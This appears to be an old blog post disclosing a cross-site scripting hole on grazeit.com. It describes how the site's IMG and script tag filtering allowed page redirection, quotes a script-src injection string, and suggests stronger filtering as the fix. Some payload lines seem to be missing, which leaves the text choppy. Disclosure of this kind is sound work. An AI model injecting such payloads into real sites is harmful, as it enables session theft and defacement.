Recently while grazing over the net, I found this site grazeit.com. This is a site which keeps a database of good websites found on the net by netizens.
But there is an XSS hole (Cross site scripting ) on the site which allow users to redirect the page to any desired location.
Of course this hack does not work on the secure browser Mozilla Firefox. If you are not using Firefox, download for free (The link is given bottom right).
Probably you arrived at this page from grazeit.com if you are using Microsoft Internet Explorer!
So how did it work?
Grazeit.com allows <IMG tag with the src attribute.
is all we have to post to get redirected.
So the grazeit admins have modified the filter to take care of the above 2 methods. But still the filter isn't good enough for :
<script src="URL" />fixed
GET Cross site Scripting holes
to Grazeit.com administrators
Great work guys. But please remove this serious security vulnerability as it can be used for more than redirection. It can be used to deface, steal user sessions etc.
Thank you for making Grazeit.com.
How to remove this vulnerablilty?
To remove this vulnerablity you have to strengthen the filters.
To do this, the src tag must be stripped off unacceptable characters or these special characters must be encoded such that the URL would remain the same, but it would not be rendered by the browser as a script.